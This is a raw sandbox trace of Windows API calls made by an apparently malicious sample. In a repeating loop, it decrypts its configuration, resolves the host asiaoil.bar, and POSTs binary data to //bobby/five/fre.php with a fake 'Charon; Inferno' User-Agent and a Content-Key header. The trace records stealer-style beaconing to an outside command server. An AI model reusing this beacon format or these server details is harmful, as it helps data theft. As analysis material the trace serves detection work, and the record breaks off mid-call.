[0304.273] GetProcessHeap () returned 0x740000 [0304.273] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0304.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.274] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.275] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.276] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.277] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.277] GetProcessHeap () returned 0x740000 [0304.277] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c070 [0304.277] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.277] GetProcessHeap () returned 0x740000 [0304.278] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c070 | out: hHeap=0x740000) returned 1 [0304.281] GetProcessHeap () returned 0x740000 [0304.282] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0304.282] GetProcessHeap () returned 0x740000 [0304.282] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763980 | out: hHeap=0x740000) returned 1 [0304.282] GetProcessHeap () returned 0x740000 [0304.282] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7636f8 [0304.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.283] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.335] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d430) returned 1 [0304.341] GetProcessHeap () returned 0x740000 [0304.341] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0304.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.342] CryptImportKey (in: hProv=0x75d430, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0304.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.343] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.344] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.344] GetProcessHeap () returned 0x740000 [0304.345] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0304.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.346] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7636f8, pdwDataLen=0x19fcfc | out: pbData=0x7636f8, pdwDataLen=0x19fcfc) returned 1 [0304.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.346] CryptDestroyKey (hKey=0x74d768) returned 1 [0304.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.347] CryptReleaseContext (hProv=0x75d430, dwFlags=0x0) returned 1 [0304.347] GetProcessHeap () returned 0x740000 [0304.347] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0304.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.349] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0304.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.350] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0304.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.351] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0304.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.352] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0304.352] GetProcessHeap () returned 0x740000 [0304.352] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdf0 [0304.352] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0304.353] GetProcessHeap () returned 0x740000 [0304.353] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b670 [0304.353] socket (af=2, type=1, protocol=6) returned 0x2ac [0304.354] connect (s=0x2ac, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0304.375] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0304.375] GetProcessHeap () returned 0x740000 [0304.375] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0304.375] GetProcessHeap () returned 0x740000 [0304.376] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0304.376] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0304.377] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0304.377] GetProcessHeap () returned 0x740000 [0304.378] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0304.378] GetProcessHeap () returned 0x740000 [0304.378] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0304.378] GetProcessHeap () returned 0x740000 [0304.378] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d70 [0304.378] GetProcessHeap () returned 0x740000 [0304.378] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0304.379] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0304.380] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0304.380] GetProcessHeap () returned 0x740000 [0304.380] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0304.380] GetProcessHeap () returned 0x740000 [0304.380] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0304.380] send (s=0x2ac, buf=0x747928*, len=243, flags=0) returned 243 [0304.381] send (s=0x2ac, buf=0x761fd0*, len=159, flags=0) returned 159 [0304.381] GetProcessHeap () returned 0x740000 [0304.381] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0304.381] recv (in: s=0x2ac, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 567 [0304.470] GetProcessHeap () returned 0x740000 [0304.470] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0304.471] GetProcessHeap () returned 0x740000 [0304.471] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d70 | out: hHeap=0x740000) returned 1 [0304.471] GetProcessHeap () returned 0x740000 [0304.471] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0304.471] GetProcessHeap () returned 0x740000 [0304.471] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0304.471] closesocket (s=0x2ac) returned 0 [0304.472] GetProcessHeap () returned 0x740000 [0304.472] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b670 | out: hHeap=0x740000) returned 1 [0304.472] GetProcessHeap () returned 0x740000 [0304.472] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0304.472] GetProcessHeap () returned 0x740000 [0304.472] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7636f8 | out: hHeap=0x740000) returned 1 [0304.472] GetProcessHeap () returned 0x740000 [0304.472] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0304.473] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1054) returned 0x2ac [0304.474] Sleep (dwMilliseconds=0xea60) [0304.475] GetProcessHeap () returned 0x740000 [0304.476] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763938 [0304.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.477] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.482] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0304.495] GetProcessHeap () returned 0x740000 [0304.495] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0304.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.496] CryptImportKey (in: hProv=0x75d298, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0304.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.497] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.498] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.498] GetProcessHeap () returned 0x740000 [0304.498] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0304.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.499] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763938, pdwDataLen=0x19fcfc | out: pbData=0x763938, pdwDataLen=0x19fcfc) returned 1 [0304.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.500] CryptDestroyKey (hKey=0x74d768) returned 1 [0304.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.502] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0304.502] GetProcessHeap () returned 0x740000 [0304.502] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0304.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.503] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.504] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.505] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.505] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.506] GetProcessHeap () returned 0x740000 [0304.506] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be40 [0304.506] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.506] GetProcessHeap () returned 0x740000 [0304.506] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be40 | out: hHeap=0x740000) returned 1 [0304.506] GetProcessHeap () returned 0x740000 [0304.506] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0304.506] GetProcessHeap () returned 0x740000 [0304.507] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0304.507] GetProcessHeap () returned 0x740000 [0304.507] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7638a8 [0304.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.507] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.515] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cf68) returned 1 [0304.536] GetProcessHeap () returned 0x740000 [0304.536] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0304.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.537] CryptImportKey (in: hProv=0x75cf68, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0304.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.538] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.562] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.562] GetProcessHeap () returned 0x740000 [0304.563] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0304.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.564] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7638a8, pdwDataLen=0x19fcfc | out: pbData=0x7638a8, pdwDataLen=0x19fcfc) returned 1 [0304.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.565] CryptDestroyKey (hKey=0x74d768) returned 1 [0304.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.566] CryptReleaseContext (hProv=0x75cf68, dwFlags=0x0) returned 1 [0304.566] GetProcessHeap () returned 0x740000 [0304.566] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0304.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.567] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0304.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.567] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0304.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.568] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0304.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.569] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0304.569] GetProcessHeap () returned 0x740000 [0304.569] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0304.569] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0304.572] GetProcessHeap () returned 0x740000 [0304.572] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b530 [0304.572] socket (af=2, type=1, protocol=6) returned 0x2b0 [0304.572] connect (s=0x2b0, name=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0304.594] FreeAddrInfoW (pAddrInfo=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0304.594] GetProcessHeap () returned 0x740000 [0304.594] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d210 [0304.594] GetProcessHeap () returned 0x740000 [0304.594] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0304.595] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0304.596] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0304.596] GetProcessHeap () returned 0x740000 [0304.596] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0304.596] GetProcessHeap () returned 0x740000 [0304.596] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0304.597] GetProcessHeap () returned 0x740000 [0304.597] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d28 [0304.597] GetProcessHeap () returned 0x740000 [0304.597] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0304.597] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0304.598] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0304.598] GetProcessHeap () returned 0x740000 [0304.598] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0304.598] GetProcessHeap () returned 0x740000 [0304.598] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0304.599] send (s=0x2b0, buf=0x747928*, len=243, flags=0) returned 243 [0304.599] send (s=0x2b0, buf=0x761fd0*, len=159, flags=0) returned 159 [0304.599] GetProcessHeap () returned 0x740000 [0304.599] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0304.599] recv (in: s=0x2b0, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0304.692] GetProcessHeap () returned 0x740000 [0304.693] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0304.693] GetProcessHeap () returned 0x740000 [0304.694] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d28 | out: hHeap=0x740000) returned 1 [0304.694] GetProcessHeap () returned 0x740000 [0304.694] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0304.694] GetProcessHeap () returned 0x740000 [0304.694] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d210 | out: hHeap=0x740000) returned 1 [0304.694] closesocket (s=0x2b0) returned 0 [0304.695] GetProcessHeap () returned 0x740000 [0304.695] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b530 | out: hHeap=0x740000) returned 1 [0304.695] GetProcessHeap () returned 0x740000 [0304.695] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0304.696] GetProcessHeap () returned 0x740000 [0304.696] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7638a8 | out: hHeap=0x740000) returned 1 [0304.696] GetProcessHeap () returned 0x740000 [0304.696] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0304.697] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1058) returned 0x2b0 [0304.698] Sleep (dwMilliseconds=0xea60) [0304.700] GetProcessHeap () returned 0x740000 [0304.700] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763c98 [0304.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.701] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.706] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0304.713] GetProcessHeap () returned 0x740000 [0304.713] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0304.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.714] CryptImportKey (in: hProv=0x75cc38, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0304.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.716] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.717] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.717] GetProcessHeap () returned 0x740000 [0304.717] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0304.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.718] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763c98, pdwDataLen=0x19fcfc | out: pbData=0x763c98, pdwDataLen=0x19fcfc) returned 1 [0304.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.719] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0304.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.720] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0304.720] GetProcessHeap () returned 0x740000 [0304.720] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0304.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.721] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.722] StrStrA 